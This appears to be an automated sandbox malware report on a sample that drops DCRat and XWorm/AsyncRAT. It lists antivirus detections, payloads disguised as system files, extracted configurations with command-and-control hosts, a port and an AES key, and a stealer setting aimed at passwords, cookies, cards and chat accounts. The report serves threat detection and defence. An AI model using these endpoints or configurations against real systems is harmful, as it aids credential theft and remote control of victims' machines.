                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Recovery\XClient.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Roaming\XClient.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAvira: detection malicious, Label: VBS/Runner.VPG
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeAvira: detection malicious, Label: VBS/Runner.VPG
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeAvira: detection malicious, Label: VBS/Runner.VPG
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files\Uninstall Information\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"9\":\">\",\"A\":\"_\",\"a\":\"#\",\"4\":\"&\",\"j\":\"`\",\"i\":\")\",\"0\":\"(\",\"o\":\"~\",\"D\":\"!\",\"k\":\"$\",\"y\":\"|\",\"h\":\"@\",\"Q\":\"-\",\"H\":\"%\",\"S\":\" \",\"d\":\"<\",\"M\":\"*\",\"3\":\",\",\"J\":\";\",\"L\":\".\",\"m\":\"^\"}", "PCRT": "{\"O\":\"^\",\"U\":\"*\",\"v\":\"(\",\"V\":\")\",\"5\":\"!\",\"M\":\",\",\"Q\":\"$\",\"h\":\"-\",\"0\":\"_\",\"T\":\"~\",\"W\":\"@\",\"j\":\".\",\"1\":\"#\",\"L\":\"%\",\"K\":\"|\",\"t\":\";\",\"y\":\">\",\"a\":\"<\",\"o\":\" \",\"B\":\"&\",\"u\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-s86YqWdFI22lJKKIYeYT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "H2": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "T": "0"}
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "letter-takes.gl.at.ply.gg"], "Port": "50230", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                      Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeReversingLabs: Detection: 87%
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeReversingLabs: Detection: 87%
                      Source: C:\Program Files\Uninstall Information\OfficeClickToRun.exeReversingLabs: Detection: 87%
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exeReversingLabs: Detection: 87%
                      Source: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exeReversingLabs: Detection: 87%
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: C:\Recovery\XClient.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeReversingLabs: Detection: 72%
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeReversingLabs: Detection: 94%
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeReversingLabs: Detection: 95%
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 95%
                      Source: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeReversingLabs: Detection: 87%
                      Source: ywXeiXEvP2.exeReversingLabs: Detection: 73%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
                      Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exeJoe Sandbox ML: detected
                      Source: C:\Recovery\XClient.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Uninstall Information\OfficeClickToRun.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJoe Sandbox ML: detected
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: 127.0.0.1,letter-takes.gl.at.ply.gg
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: 50230
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: <123456789>
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: <Xwormmm>
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: XWorm V5.6
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: USB.exe
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: %AppData%
                      Source: 1.0.Result.exe.7c9678.2.raw.unpackString decryptor: XClient.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\d908c538d2e8d0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Multimedia Platform\d908c538d2e8d0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\7ccfebd9e92364
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\9e8d7a4ca61bd9
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Uninstall Information\OfficeClickToRun.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Uninstall Information\e6c9b481da804f
                      Source: ywXeiXEvP2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Result.exe
                      Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: ywXeiXEvP2.exe
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7C018647C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7C019ECE0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B3130 FindFirstFileExA,0_2_00007FF7C01B3130
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_008DA5F4
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_008EB8E0

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:53174 -> 147.185.221.19:50230
                      Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:53194 -> 147.185.221.19:50230
                      Source: Malware configuration extractorURLs: 127.0.0.1
                      Source: Malware configuration extractorURLs: letter-takes.gl.at.ply.gg
                      Source: Malware configuration extractorURLs: http://a0991799.xsph.ru/@=AjM2MDZ4kjN
                      Source: global trafficTCP traffic: 192.168.2.4:53164 -> 147.185.221.19:50230
                      Source: Joe Sandbox ViewIP Address: 147.185.221.19 147.185.221.19
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: letter-takes.gl.at.ply.gg
                      Source: XClient.exe, 00000003.00000002.4161351133.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ServerWeb.exe, 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: Result.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_008D718C
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IdentityCRL\d908c538d2e8d0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IME\IMEKR\d908c538d2e8d0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\ELAMBKUP\d908c538d2e8d0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A09D80_2_00007FF7C01A09D8
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01962940_2_00007FF7C0196294
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018DC4C0_2_00007FF7C018DC4C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019ECE00_2_00007FF7C019ECE0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019569C0_2_00007FF7C019569C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A400C0_2_00007FF7C01A400C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018A8AC0_2_00007FF7C018A8AC
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018B9480_2_00007FF7C018B948
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018E91C0_2_00007FF7C018E91C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A400C0_2_00007FF7C01A400C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B59E00_2_00007FF7C01B59E0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019CA300_2_00007FF7C019CA30
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01872AC0_2_00007FF7C01872AC
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018B3180_2_00007FF7C018B318
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B55100_2_00007FF7C01B5510
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01AFD180_2_00007FF7C01AFD18
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01ABDF80_2_00007FF7C01ABDF8
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018BF0C0_2_00007FF7C018BF0C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B2F240_2_00007FF7C01B2F24
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B90080_2_00007FF7C01B9008
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01AC0740_2_00007FF7C01AC074
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008D857B2_2_008D857B
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E70BF2_2_008E70BF
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008FD00E2_2_008FD00E
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008D407E2_2_008D407E
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_009011942_2_00901194
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008D32812_2_008D3281
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DE2A02_2_008DE2A0
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F02F62_2_008F02F6
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E66462_2_008E6646
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E37C12_2_008E37C1
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008D27E82_2_008D27E8
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F070E2_2_008F070E
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F473A2_2_008F473A
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DE8A02_2_008DE8A0
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DF9682_2_008DF968
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F49692_2_008F4969
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E3A3C2_2_008E3A3C
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E6A7B2_2_008E6A7B
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F0B432_2_008F0B43
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008FCB602_2_008FCB60
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E5C772_2_008E5C77
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EFDFA2_2_008EFDFA
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DED142_2_008DED14
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008E3D6D2_2_008E3D6D
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DBE132_2_008DBE13
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DDE6C2_2_008DDE6C
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008D5F3C2_2_008D5F3C
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F0F782_2_008F0F78
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFD9B7C64063_2_00007FFD9B7C6406
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFD9B7C05A03_2_00007FFD9B7C05A0
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFD9B7C71B23_2_00007FFD9B7C71B2
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9B8035558_2_00007FFD9B803555
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9B815B008_2_00007FFD9B815B00
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 37_2_00007FFD9B7C355537_2_00007FFD9B7C3555
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 38_2_00007FFD9B7C355538_2_00007FFD9B7C3555
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B8033AC41_2_00007FFD9B8033AC
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B80C74041_2_00007FFD9B80C740
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802B2041_2_00007FFD9B802B20
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802B2041_2_00007FFD9B802B20
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802B2041_2_00007FFD9B802B20
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802B2041_2_00007FFD9B802B20
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\jDownloader\config\conhost.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                      Source: Joe Sandbox ViewDropped File: C:\Program Files\Uninstall Information\OfficeClickToRun.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
